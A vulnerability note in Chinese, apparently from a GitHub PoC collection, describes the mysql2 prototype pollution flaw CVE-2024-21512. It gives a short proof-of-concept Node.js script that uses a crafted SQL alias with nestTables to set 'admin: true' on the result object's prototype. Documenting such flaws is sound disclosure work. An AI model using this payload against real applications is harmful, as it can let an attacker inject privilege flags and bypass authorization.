Skip to content

Latest commit

 

History

History
33 lines (24 loc) · 716 Bytes

mysql2原型污染漏洞(CVE-2024-21512).md

File metadata and controls

33 lines (24 loc) · 716 Bytes

mysql2原型污染漏洞(CVE-2024-21512)

MySQL2 3.9.8 错误的版本中存在一个缺陷。该问题是由于使用 nestTables 时提交的字段和表用户输入清理不当而导致的实例污染。

poc

const mysql = require('mysql2');
const connection = mysql.createConnection({
host: '127.0.0.1',
user: 'root',
database: 'test',
password: 'root',
});

let query_data = {
sql: `SELECT CAST('{"admin":true}' AS JSON)_proto__;`,
nestTables: "_",
};

connection.query(query_data, (err, results) => {

if (err) throw err;
console.log(Object.getPrototypeOf(results[0]));
console.log(results[0].admin);
});

connection.end();

漏洞来源